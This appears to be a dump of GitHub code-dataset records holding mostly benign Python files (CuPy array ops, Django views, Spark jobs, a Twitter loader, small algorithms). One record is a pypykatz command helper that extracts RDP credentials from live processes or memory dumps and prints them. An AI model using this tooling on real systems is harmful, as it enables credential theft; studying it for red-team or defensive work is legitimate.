raise ValueError('Input must be >= 2-d')\n return a[::, ::-1]\n\n\ndef flipud(a):\n \"\"\"Flip array in the up/down direction.\n\n Flip the entries in each column in the up/down direction. Rows are\n preserved, but appear in a different order than before.\n\n Args:\n a (~cupy.ndarray): Input array.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. seealso:: :func:`numpy.flipud`\n\n \"\"\"\n if a.ndim < 1:\n raise ValueError('Input must be >= 1-d')\n return a[::-1]\n\n\ndef roll(a, shift, axis=None):\n \"\"\"Roll array elements along a given axis.\n\n Elements that roll beyond the last position are re-introduced at the first.\n\n Args:\n a (~cupy.ndarray): Array to be rolled.\n shift (int or tuple of int): The number of places by which elements are\n shifted. If a tuple, then `axis` must be a tuple of the same size,\n and each of the given axes is shifted by the corresponding number.\n If an int while `axis` is a tuple of ints, then the same value is\n used for all given axes.\n axis (int or tuple of int or None): The axis along which elements are\n shifted. By default, the array is flattened before shifting, after\n which the original shape is restored.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. seealso:: :func:`numpy.roll`\n\n \"\"\"\n if axis is None:\n return roll(a.ravel(), shift, 0).reshape(a.shape)\n else:\n axis = _get_axis(axis, a.ndim)[0]\n\n broadcasted = numpy.broadcast(shift, axis)\n if broadcasted.nd > 1:\n raise ValueError(\n '\\'shift\\' and \\'axis\\' should be scalars or 1D sequences')\n shifts = {ax: 0 for ax in range(a.ndim)}\n for sh, ax in broadcasted:\n shifts[ax] += sh\n\n rolls = [((slice(None), slice(None)),)] * a.ndim\n for ax, offset in shifts.items():\n offset %= a.shape[ax] or 1 # If `a` is empty, nothing matters.\n if offset:\n # (original, result), (original, result)\n rolls[ax] = ((slice(None, -offset), slice(offset, None)),\n (slice(-offset, None), slice(None, offset)))\n\n result = cupy.empty_like(a)\n for indices in itertools.product(*rolls):\n arr_index, res_index = zip(*indices)\n result[res_index] = a[arr_index]\n\n return result\n\n\ndef rot90(a, k=1, axes=(0, 1)):\n \"\"\"Rotate an array by 90 degrees in the plane specified by axes.\n\n Note that ``axes`` argument has been introduced since NumPy v1.12.\n The contents of this document is the same as the original one.\n\n Args:\n a (~cupy.ndarray): Array of two or more dimensions.\n k (int): Number of times the array is rotated by 90 degrees.\n axes: (tuple of ints): The array is rotated in the plane defined by\n the axes. Axes must be different.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. seealso:: :func:`numpy.rot90`\n\n \"\"\"\n a_ndim = a.ndim\n if a_ndim < 2:\n raise ValueError('Input must be >= 2-d')\n\n axes = tuple(axes)\n if len(axes) != 2:\n raise ValueError('len(axes) must be 2')\n if axes[0] == axes[1] or abs(axes[0] - axes[1]) == a_ndim:\n raise ValueError('axes must be different')\n if not (-a_ndim <= axes[0] < a_ndim and -a_ndim <= axes[1] < a_ndim):\n raise ValueError('axes must be >= %d and < %d' % (-a_ndim, a_ndim))\n\n k = k % 4\n\n if k == 0:\n return a[:]\n if k == 2:\n return _flip(_flip(a, axes[0]), axes[1])\n\n axes_t = list(range(0, a_ndim))\n axes_t[axes[0]], axes_t[axes[1]] = axes_t[axes[1]], axes_t[axes[0]]\n\n if k == 1:\n return cupy.transpose(_flip(a, axes[1]), axes_t)\n else:\n return _flip(cupy.transpose(a, axes_t), axes[1])\n\n\ndef _flip(a, axis):\n # This function flips array without checking args.\n indexer = [slice(None)] * a.ndim\n indexer[axis] = slice(None, None, -1)\n\n return a[tuple(indexer)]\n","repo_name":"yuhc/ava-cupy","sub_path":"cupy/manipulation/rearrange.py","file_name":"rearrange.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37436332277","text":"from collections import defaultdict\n\nimport sqlalchemy\nfrom sqlalchemy.orm import sessionmaker\n\nfrom model import GPSTrack, db_url, Categorization\n\n\nif __name__ == '__main__':\n\n engine = sqlalchemy.create_engine(db_url(), echo=False)\n Session = sessionmaker(bind=engine)\n session = Session()\n\n namings = defaultdict(lambda: defaultdict(set))\n\n for track in (\n session.query(GPSTrack)\n .filter(GPSTrack.source == '4sq')\n ):\n venue = track.raw.get('venue', {})\n primary_categories = [c for c in venue.get('categories', []) if c.get('primary', False)]\n primary_category = primary_categories[0]['name'] if primary_categories else None\n\n namings[primary_category][track.description].add(f\"{track.name}\")\n\n for p_c, names in namings.items():\n for name, items in names.items():\n if name == p_c:\n continue\n if len(names) == 1:\n print(f\"Always map {name} <= {p_c}: {', '.join(items)}\")\n c = Categorization(category=name, old_category=p_c)\n session.add(c)\n else:\n print(f\"Map {name} <= {', '.join(items)}\")\n for old_name in items:\n c = Categorization(category=name, old_name=old_name)\n session.add(c)\n\n session.commit()\n\n # pprint(namings, width=200)\n # pprint(sorted(names))","repo_name":"WanderingStar/gpx-cleanup","sub_path":"src/geodb/learn_categorization.py","file_name":"learn_categorization.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1291388783","text":"from datetime import datetime\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, date_format, udf, sum, desc, row_number, avg\nfrom pyspark.sql.types import (DateType, IntegerType, FloatType, StructField,\n StructType, TimestampType, StringType)\nfrom pyspark.sql.window import Window\n\ndef main(n):\n ciclistas, rutas, actividades = cargarDatos()\n topProvincia, topKm = getTopNReports(n, ciclistas, rutas, actividades)\n\n # \"Top n por provincia:\"\n topProvincia.show()\n\n #\"Top n con mejor promedio diario de km recorridos\"\n topKm.show()\n\ndef cargarDatos():\n spark = SparkSession.builder.appName(\"Read Transactions\").getOrCreate()\n\n ciclista_scheme = StructType([StructField('ciclista_id', StringType()),\n StructField('nombre', StringType()),\n StructField('provincia', StringType()),\n ])\n\n ruta_scheme = StructType([StructField('ruta_id', IntegerType()),\n StructField('ruta_nombre', StringType()),\n StructField('longitud', IntegerType()),\n ])\n\n actividad_scheme = StructType([StructField('ruta', IntegerType()),\n StructField('ciclista', StringType()),\n StructField('fecha', DateType()),\n ])\n\n ciclistas = spark.read.csv(\"/data/ciclista.csv\", schema=ciclista_scheme, header=False)\n rutas = spark.read.csv(\"/data/ruta.csv\", schema=ruta_scheme, header=False)\n actividades = spark.read.csv(\"/data/actividad.csv\", schema=actividad_scheme, header=False)\n\n return ciclistas, rutas, actividades\n\n\ndef getTopNReports(n, ciclistas, rutas, actividades):\n\n joint = joinThem(ciclistas, rutas, actividades)\n\n agregatedProvincia = getAgregatedProvincia(joint)\n agregatedKmDay = getAgregatedKmDay(joint)\n\n topProvincia = topNParticionado(n, agregatedProvincia, columnPartition=\"provincia\", orderedBy=\"total_km\")\n topKm = topN(n, agregatedKmDay, orderedBy=\"promedio_diario\")\n\n return topProvincia, topKm\n\n\ndef joinThem(ciclistas, rutas, actividades):\n joint = ciclistas \\\n .join(actividades, ciclistas.ciclista_id == actividades.ciclista, \"leftouter\") \\\n .join(rutas, actividades.ruta == rutas.ruta_id, \"leftouter\")\n \n return joint\n\n\ndef getAgregatedProvincia(joint):\n return joint.groupBy(\"provincia\", \"ciclista_id\") \\\n .agg(sum(\"longitud\").alias(\"total_km\"))\n\n\ndef getAgregatedKmDay(joint):\n return joint.groupBy(\"ciclista_id\", \"fecha\") \\\n .agg(sum(\"longitud\").alias(\"por_dia\")) \\\n .groupBy(\"ciclista_id\") \\\n .agg(avg(\"por_dia\").alias(\"promedio_diario\"))\n\n\ndef topNParticionado(n, df, columnPartition, orderedBy):\n window = Window.partitionBy(columnPartition).orderBy(col(orderedBy).desc())\n return df \\\n .fillna(value=0, subset=[orderedBy]) \\\n .withColumn(\"row\", row_number().over(window)) \\\n .filter(col(\"row\") <= n) \\\n .drop(\"row\")\n\ndef topN(n, df, orderedBy):\n return df \\\n .fillna(value=0, subset=[orderedBy]) \\\n .orderBy(col(orderedBy).desc()) \\\n .limit(n)\n","repo_name":"netor82/dataScience","sub_path":"bigData/tarea1/src/reporte.py","file_name":"reporte.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21556745885","text":"from django.shortcuts import render\nfrom .models import Book,BookInstance,Author,Genre\n\n# Create your views here.\n\ndef index(request):\n nu_of_books= Book.objects.all().count()\n nu_of_BookInstance=BookInstance.objects.all().count()\n num_instances_available = BookInstance.objects.filter(status__exact='a').count()\n num_authors = Author.objects.count()\n context = {\n 'num_books': nu_of_books,\n 'num_instances': nu_of_BookInstance,\n 'num_instances_available': num_instances_available,\n 'num_authors': num_authors,\n }\n return render(request, 'index.html', context=context)\n\n\n","repo_name":"galactus299/Web-tenology","sub_path":"django/locallibrary/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21715436882","text":"'''\r\nretrieve tweets from Twitter\r\nand embeddings from Spacy\r\nand persist in the database\r\n\r\nRJProctor\r\n'''\r\nfrom os import getenv\r\nimport tweepy\r\nfrom .models import DB, Tweet, User\r\nimport spacy\r\n\r\n\r\n# https://greatist.com/happiness/must-follow-twitter-accounts\r\nTWITTER_USERS = ['calebhicks', 'elonmusk', 'rrherr','SteveMartinToGo',\r\n 'alynkovic', 'nasa', 'sadserver', 'jkholand', 'austen',\r\n 'common_squirrel', 'KenJennings', 'conanobrian',\r\n 'big_ben_clock', 'IAM_SHAKESPEAR']\r\n\r\n# creates twitter object \r\n# authorized twitter API connection\r\nTWITTER_AUTH = tweepy.OAuthHandler(getenv('TWITTER_API_KEY'), \r\n getenv('TWITTER_API_KEY_SECRET'))\r\nTWITTER_AUTH.set_access_token(getenv('TWITTER_API_BEARER_TOKEN'), \r\n getenv('TWITTER_API_BEARER_TOKEN_SECRET'))\r\nTWITTER = tweepy.API(TWITTER_AUTH)\r\n\r\n\r\n# load vectorization model\r\n# to return string values as numpy arrays\r\n# for use in logistic regression model\r\n# (preprocessing)\r\nnlp = spacy.load('my_model')\r\ndef vectorize_tweet(tweet_text):\r\n return nlp(tweet_text).vector\r\n\r\n\r\n# create function to add or updates a user\r\n# and add their corresponding tweets\r\ndef add_or_update_user(username):\r\n '''\r\n add or update a user and their corresponding tweets\r\n return error if not a Twitter user\r\n (one function to serve them all)\r\n '''\r\n try:\r\n # define twitter user \r\n twitter_user = TWITTER.get_user(username)\r\n # query for twitter user\r\n db_user = (User.query.get(twitter_user.id) or\r\n # filter for user and update user\r\n # if user exists (if query True)\r\n User(id=twitter_user.id, name=username))\r\n # instantiate new twitter user\r\n # if no user exists (if query False)\r\n # add user to database\r\n DB.session.add(db_user)\r\n \r\n # pull tweets - limit to primary tweets \r\n # (no retweets/reply tweets)\r\n tweets = twitter_user.timeline(\r\n count=200, exclude_replies=True, include_rts=False,\r\n tweet_mode='extended', since_id=db_user.newest_tweet_id)\r\n # filters to unseen tweets\r\n \r\n # store newest tweet id\r\n if tweets:\r\n db_user.newest_tweet_id = tweets[0].id\r\n\r\n # instantiate, append to user, and add to database\r\n for tweet in tweets:\r\n # create new column/store most recent tweet\r\n # with describtion of tweet in user table \r\n # calculate embedding on full tweet, but truncate for storing model='twitter')\r\n vectorized_tweet = vectorize_tweet(tweet.full_text)\r\n db_tweet = Tweet(id=tweet.id, text=tweet.full_text[:300],\r\n vect=vectorized_tweet)\r\n db_user.tweets.append(db_tweet)\r\n DB.session.add(db_tweet)\r\n \r\n # persist changes to database\r\n DB.session.commit()\r\n\r\n # create exception to handle errors\r\n except Exception as e:\r\n # returns error to end user\r\n print('Error processing {}: {}'.format(username, e))\r\n # returns error to the rest of the packages know about the exception\r\n raise e\r\n else: \r\n # save changes to database\r\n DB.session.commit()\r\n\r\n\r\n# # add data to database\r\n# def add_users():\r\n# '''\r\n# Add/update a list of users \r\n# (strings of user names).\r\n# May take awhile, so run \"offline\" \r\n# (flask shell).\r\n# '''\r\n# # add data to database\r\n# for user in users:\r\n# add_or_update_user(user)\r\n\r\n\r\n# add data to database\r\ndef update_all_users():\r\n '''\r\n Update all Tweets for all\r\n Users in the User table.\r\n '''\r\n # update all user data in database\r\n for user in User.query.all():\r\n add_or_update_user(user.name)\r\n\r\n# # add data to database\r\n# def insert_example_users():\r\n# # add sample data to database\r\n# add_or_update_user('austen')\r\n# add_or_update_user('elonmusk')\r\n","repo_name":"DS-rjp/twitoff","sub_path":"twitoff/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3754680872","text":"from collections import Counter\nfrom itertools import combinations\n\n\ndef solution(orders, course) : \n answer = []\n\n for c_length in course : \n temp = []\n\n for order in orders : \n # 조합 라이브러리 함수(문자열 조합을 갯수에 맞게 계산)\n combi = combinations(sorted(order), c_length)\n # 문자열 조합을 temp에 저장\n temp += list(combi)\n\n # 갯수 세어주는 라이브러리 함수(딕셔너리 형태로 분류해서 총 가짓수를 구해줌)\n counter = Counter(temp)\n\n # 길이가 0 이상이고 가장 큰 조합 갯수가 최소 2번 이상인 값만 구해줌\n if len(counter) != 0 and max(counter.values()) != 1 :\n for c_factor in counter : \n if counter[c_factor] == max(counter.values()) :\n # join 써서 문자열 리스트를 하나의 문자열로 결합\n answer.append(''.join(c_factor)) \n\n return sorted(answer)","repo_name":"KB-team3/AlgoGGang","sub_path":"김태선/Week_11/P72411_메뉴 리뉴얼.py","file_name":"P72411_메뉴 리뉴얼.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"4483606316","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/7/14 16:53\n# @Author : Mamamooo\n# @Site :\n# @File : lec_725.py\n# @Software: PyCharm\n\"\"\"\n你有一个带有四个圆形拨轮的转盘锁。每个拨轮都有10个数字: '0', '1', '2', '3', '4', '5', '6', '7', '8', '9' 。\n每个拨轮可以自由旋转:例如把 '9' 变为  '0','0' 变为 '9' 。每次旋转都只能旋转一个拨轮的一位数字。\n锁的初始数字为 '0000' ,一个代表四个拨轮的数字的字符串。\n列表 deadends 包含了一组死亡数字,一旦拨轮的数字和列表里的任何一个元素相同,这个锁将会被永久锁定,无法再被旋转。\n字符串 target 代表可以解锁的数字,你需要给出最小的旋转次数,如果无论如何不能解锁,返回 -1。\n示例 1:\n输入:deadends = [\"0201\",\"0101\",\"0102\",\"1212\",\"2002\"], target = \"0202\"\n输出:6\n解释:\n可能的移动序列为 \"0000\" -> \"1000\" -> \"1100\" -> \"1200\" -> \"1201\" -> \"1202\" -> \"0202\"。\n注意 \"0000\" -> \"0001\" -> \"0002\" -> \"0102\" -> \"0202\" 这样的序列是不能解锁的,\n因为当拨动到 \"0102\" 时这个锁就会被锁定。\n\"\"\"\nimport collections\n\nclass Solution:\n def openLock(self, deadends, target):\n def neighbors(node):\n for i in range(4):\n x = int(node[i])\n for d in (-1,1):\n y = (x + d) % 10\n yield node[:i] + str(y) + node[i+1:]\n\n dead = set(deadends)\n queue = collections.deque([('0000',0)])\n seen = {'0000'}\n while queue:\n node,depth = queue.popleft()\n if node == target:\n return depth\n if node in dead:\n continue\n for nei in neighbors(node):\n if nei not in seen:\n seen.add(nei)\n queue.append((nei,depth + 1))\n return -1\n\ndeadends = [\"0201\",\"0101\",\"0102\",\"1212\",\"2002\"]\ntarget = \"0202\"\ns = Solution()\nreslut = s.openLock(deadends,target)\n\nprint(reslut)\n\n\n\n\n\n\n\n\n","repo_name":"latata666/newcoder","sub_path":"leecode/lec_725.py","file_name":"lec_725.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39511562278","text":"# Polynomial grp 1_2\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndataset = pd.read_excel('Age polynomial regression.xlsx')\r\nX = dataset.iloc[:,:-1].values\r\ny = dataset.loc[:, 'height'].values\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split (X, y,\r\n test_size = 0.2)\r\n\r\n# Linear Regressor\r\nfrom sklearn.linear_model import LinearRegression\r\nlr = LinearRegression()\r\nlr.fit(X_train, y_train)\r\n\r\n# Linear regression Visualization\r\nplt.scatter(X_train, y_train, color = 'green')\r\nplt.plot (X_train, lr.predict(X_train), color = 'red')\r\nplt.title('Linear regression')\r\nplt.ylabel('Salary')\r\nplt.xlabel('Exp')\r\nplt.show()\r\n\r\n# Polynomial feature\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nX_poly = poly_reg.fit_transform(X_train)\r\n\r\n# Integration\r\nlr2 = LinearRegression()\r\nlr2.fit(X_poly, y_train)\r\n\r\n# Polynomial regression Visualization\r\nplt.scatter(X_train, y_train)\r\nplt.plot(X_train, lr2.predict(poly_reg.fit_transform(X_train)), color = 'green')\r\nplt.title('Polynomial regression')\r\nplt.ylabel('Salary')\r\nplt.xlabel('Exp')\r\nplt.show()\r\n\r\nlr2.predict(poly_reg.fit_transform([[24]]))\r\nlr2.predict(poly_reg.fit_transform([[30]]))\r\n\r\nlr.predict([[24]])\r\n\r\npred = lr2.predict(poly_reg.fit_transform(X_test))\r\n\r\nplt.scatter(X_test, y_test)\r\nplt.plot(X_test, lr2.predict(poly_reg.fit_transform(X_test)), color = 'green')\r\nplt.title('Polynomial regression')\r\nplt.ylabel('Salary')\r\nplt.xlabel('Exp')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sidsharma1990/PracticeUno","sub_path":"Polynomial grp 1_2.py","file_name":"Polynomial grp 1_2.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19627173912","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom ..models import Projet\nfrom ..models import UserHasProjet as Team\nfrom ..forms import TeamForm, AddUserProjectForm\nfrom django.shortcuts import get_list_or_404, get_object_or_404\nfrom django.contrib import messages\n\nfrom django.contrib.auth.decorators import login_required\nfrom ..decorators import admin_only\n@login_required(login_url='login')\n# UserHasProjets views\ndef list(request, *args, **kwargs):\n\tteams = Team.objects.all()\n\tcontext = {\n\t\t'teams':teams\n\t}\n\treturn render(request, 'team/index.html', context=context)\n\n@login_required(login_url='login')\n@admin_only\ndef create(request, *args, **kwargs):\n\tform = TeamForm()\n\tif request.POST:\n\t\tform = TeamForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnew = form.save(commit=False)\n\t\t\tif (not new.projet.deleted and not new.user.deleted):\n\t\t\t\tnew.save()\n\t\t\t\t# History.objects.create(content_object = new.projet, action=2, user=request.user)\n\t\t\t\tmessages.success(request, f\"Un nouvel élément a été enreigistré\")\n\n\t\t\t\treturn HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\tcontext = {\n\t\t'form': form,\n\t}\n\treturn render(request, 'team/create.html', context=context)\n\n@login_required(login_url='login')\n@admin_only\ndef add_user(request, pk):\n\tform = AddUserProjectForm()\n\tif request.POST:\n\t\tform = AddUserProjectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tteam = form.save(commit=False)\n\t\t\tteam.projet = get_object_or_404(Projet, id=pk)\n\t\t\t# print(form)\n\t\t\t# print(form.cleaned_data.get('user_role'))\n\t\t\tteam.user_role = form.cleaned_data.get('user_role')\n\t\t\tif (not team.projet.deleted and not team.user.deleted):\n\t\t\t\tteam.save()\n\t\t\t\t# History.objects.create(content_object = team.projet, action=2, user=request.user)\n\t\t\t\tmessages.success(request, f\"Un nouvel élément a été enreigistré\")\n\n\t\t\tnext = request.POST.get('next', '/')\n\t\t\treturn HttpResponseRedirect(next)\n\n\tcontext = {\n\t\t'form': form,\n\t}\n\treturn render(request, 'team/create.html', context=context)\n\n@login_required(login_url='login')\ndef show(request, pk):\n\tteam = get_object_or_404(Team, id=pk)\n\t\n\tcontext = {\n\t\t'team':team,\n\t}\n\treturn render(request, 'team/show.html', context=context)\n\n@login_required(login_url='login')\n@admin_only\ndef update(request, pk):\n\tteam = get_object_or_404(Team, id=pk)\n\tform = TeamForm(instance=team)\n\tif request.POST:\n\t\tform = TeamForm(request.POST or None, instance=team)\n\t\tif form.is_valid():\n\t\t\tteam = form.save()\n\t\t\t# History.objects.create(content_object = team.projet, action=2, user=request.user)\n\t\t\tmessages.success(request, f\"Un élément a été modifié\")\n\n\t\t\treturn HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\tcontext = {\n\t\t'form': form,\n\t}\n\treturn render(request, 'team/update.html', context=context)\n\n@login_required(login_url='login')\n@admin_only\ndef destroy(request, pk):\n\n\tteam = get_object_or_404(Team, id=pk)\n\tuser = team.user\n\tprojet = team.projet\n\t# History.objects.create(content_object = projet, action=2, user=request.user)\n\tteam.delete()\n\tmessages.success(request, f'{user} a été supprimé du projet {projet}.')\n\n\treturn HttpResponseRedirect(request.META.get('HTTP_REFERER'))","repo_name":"Lizzy2106/project-management-tool","sub_path":"pjmanager/views/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23860432207","text":"import pandas as pd\n\ndf = pd.read_csv(r'sp_analysis.csv')\ntype_of_music = ['acousticness', 'danceability', 'energy', 'instrumentalness', 'liveness', 'loudness', 'speechiness', 'valence']\ntempo = df['tempo'].mean()\ngenre_num = ['acousticness', 0]\n\nfor genre in type_of_music:\n mean = df[genre].mean()\n if mean > genre_num[1]:\n genre_num[0] = genre\n genre_num[1] = mean\n\nmost_popular_song = df['popularity'].max()\ntotal_songs = df['track_number'].count()\nalbum_with_most_songs = df.groupby(['album']).count()\n\nprint(total_songs, \"songs\")\nprint(genre_num[0], \"common genre\")\n","repo_name":"victorkingi/JARVIS","sub_path":"calculate_spotify_stats.py","file_name":"calculate_spotify_stats.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70136825014","text":"\"\"\"This file contains different classes for use in the LightSequencer class\"\"\"\n\nclass Point():\n def __init__(self, X, Y):\n self.x = X\n self.y = Y\n\nclass LampList():\n def __init__(self, TimeStamp, Name, X, Y, Processed=False):\n self.timestamp = TimeStamp\n self.name = Name\n self.processed = Processed\n self.x = X\n self.y = Y\n\nclass Effect():\n def __init__(self, Name, lamplist, Length, LightTime, Repeat, Delay):\n \"\"\"setup defaults\"\"\"\n self.point1 = Point(0, 0)\n self.point2 = Point(0, 0)\n self.name = Name\n self.lampList = list()\n self.length = Length\n self.lightTime = LightTime\n self.repeat = Repeat\n self.delay = Delay\n self.loadLamps(lamplist)\n\n def loadLamps(self, lamplist):\n for key in lamplist:\n self.temp = LampList(0, key, lamplist[key]['x'], lamplist[key]['y'], False)\n self.lampList.append(self.temp)\n\nclass Light():\n \"\"\"class to hold the status and schedule of a light. schedule is only used if status is set to custom, else default schedules are used in code\"\"\"\n def __init__(self, Name, Status, Schedule=0xFFFFFFFF):\n self.name = Name\n self.status = Status\n self.schedule = Schedule\n\n\n\n","repo_name":"zmstauffer/id4","sub_path":"id4Modes/Effect.py","file_name":"Effect.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16681949407","text":"import re\nfrom pyspark import SparkConf, SparkContext\n\ndef normalizeWords(text):\n return re.compile(r'\\W+', re.UNICODE).split(text.lower())\n\nconf = SparkConf().setMaster(\"local\").setAppName(\"WordCount\")\nsc = SparkContext(conf=conf)\n\ninput = sc.textFile(\"file:///sparkcourse/book.txt\")\nwords = input.flatMap(normalizeWords)\n#chúng ta có thể sắp xếp những gì CountByValue() trả về, nhưng hãy sử dụng RDD để giữ cho nó có thể mở rộng ( scalable).\n# Ta có thể sử dụng CountByValue(), những hãy làm chút gì đó khó hơn 1 chút.\nwordCounts = words.map(lambda x: (x,1)).reduceByKey(lambda x,y: x+y)\n# thấy không thay vì gọi CountByValue(), về cơ bản ta đã thực hiện bằng tay.\n\nwordCountsSorted = wordCounts.map(lambda x: (x[1], x[0])).sortByKey()\n\nresults = wordCountsSorted.collect()\nprint(results)\nfor result in results:\n count = str(result[0])\n word = result[1].encode('ascii', 'ignore')\n if (word):\n print(word.decode() + \":\\t\\t\" + count)\n","repo_name":"BigBird123/Homework-Spark","sub_path":"word-count-better-sorted.py","file_name":"word-count-better-sorted.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42825206496","text":"from app.service.basic import BasicService\nfrom app.dao.rtokens import RTokenDAO\nimport jwt\nfrom app.constants import JWT_KEY, JWT_METHOD\n\n\nclass RTokenService(BasicService):\n def __init__(self, session):\n super().__init__(RTokenDAO(session))\n\n def del_expired(self):\n tokens = self.dao.get_all(raise_errors=False)\n for token in tokens:\n try:\n jwt.decode(token[\"token\"], JWT_KEY, [JWT_METHOD])\n except Exception as e:\n print(f\"Token with ID={token['id']} status {e}\")\n self.dao.delete(token[\"id\"])\n","repo_name":"ipotemkin/coursework3","sub_path":"app/service/rtokens.py","file_name":"rtokens.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32425685328","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport os\nimport json\nimport glob\nimport ntpath\nimport traceback\nimport base64\n\nfrom pypykatz import logging\nfrom pypykatz.commons.common import UniversalEncoder\nfrom pypykatz.rdp.parser import RDPCredParser\n\n\n\nclass RDPCMDHelper:\n\tdef __init__(self):\n\t\tself.live_keywords = ['rdp']\n\t\tself.keywords = ['rdp']\n\t\t\n\tdef add_args(self, parser, live_parser):\n\t\tlive_group = live_parser.add_parser('rdp', help='a')\n\t\tlive_group.add_argument('--pid', type=int, help = 'Search a specific process PID for RDP creds')\n\t\tlive_group.add_argument('--all', action='store_true', help = 'Looks for all processes which use the rdp DLL')\n\n\t\tgroup = parser.add_parser('rdp', help='Parse RDP ceredentials from minidump file. Only WINVER <= Win2012')\n\t\tgroup.add_argument('cmd', choices=['minidump'])\n\t\tgroup.add_argument('memoryfile', help='path to the dump file')\n\n\tdef execute(self, args):\n\t\tif len(self.keywords) > 0 and args.command in self.keywords:\n\t\t\tself.run(args)\n\t\t\n\t\tif len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:\n\t\t\tself.run_live(args)\n\t\t\n\tdef run_live(self, args):\n\t\tcredparsers = RDPCredParser.go_live(pid = args.pid, all_rdp = args.all)\n\t\tfor credparser in credparsers:\n\t\t\tfor cred in credparser.credentials:\n\t\t\t\tprint(str(cred))\n\t\t\t\t\n\tdef run(self, args):\n\t\tcredparsers = RDPCredParser.parse_minidump_file(args.memoryfile)\n\t\tfor credparser in credparsers:\n\t\t\tfor cred in credparser.credentials:\n\t\t\t\tprint(str(cred))","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/pypykatz/pypykatz/rdp/cmdhelper.py","file_name":"cmdhelper.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"43629530030","text":"# ID: 205477003\n# Name: Sagy Krispin\n\nimport copy\nfrom utils import parser\nfrom pddlsim.parser_independent import Conjunction\n\n\"\"\"\n A copy of GoalTracking class but with a custom 'reached_all_goals' function that\n checks for goals at given state and for sub-goals aswell.\n\"\"\"\n\n\nclass GoalTrackingCustom:\n def __init__(self, services):\n self.services = services\n self.__initialize()\n\n def reached_all_goals(self, state=None, with_subgoals=False):\n if self.dirty:\n if state == None:\n state = self.services.perception.get_state()\n self._check_goal(state)\n current_completed_subgoals = self.__count_completed_subgoals(state)\n is_subgoal_completed = (\n current_completed_subgoals > self.__last_completed_subgoals_count\n )\n self.__last_completed_subgoals_count = current_completed_subgoals\n self.dirty = False\n if with_subgoals:\n return not self.uncompleted_goals, is_subgoal_completed\n return not self.uncompleted_goals\n if with_subgoals:\n return not self.uncompleted_goals, False\n return not self.uncompleted_goals\n\n def on_action(self):\n self.dirty = True\n\n def reset(self):\n self.__initialize()\n\n def __initialize(self):\n self.dirty = self.services.goal_tracking.dirty\n self.completed_goals = copy.deepcopy(\n self.services.goal_tracking.completed_goals\n )\n self.uncompleted_goals = copy.deepcopy(\n self.services.goal_tracking.uncompleted_goals\n )\n\n self.__uncompleted_subgoals = parser.flat_goals(self.uncompleted_goals)\n self.__last_completed_subgoals_count = 0\n\n def __count_completed_subgoals(self, state):\n done_subgoals = list()\n for subgoal in self.__uncompleted_subgoals:\n done_subgoal = subgoal.test(state)\n if done_subgoal:\n done_subgoals.append(subgoal)\n return len(done_subgoals)\n\n def _check_goal(self, state):\n to_remove = list()\n for goal in self.uncompleted_goals:\n done_subgoal = self.services.parser.test_condition(goal, state)\n if done_subgoal:\n to_remove.append(goal)\n for goal in to_remove:\n self.uncompleted_goals.remove(goal)\n 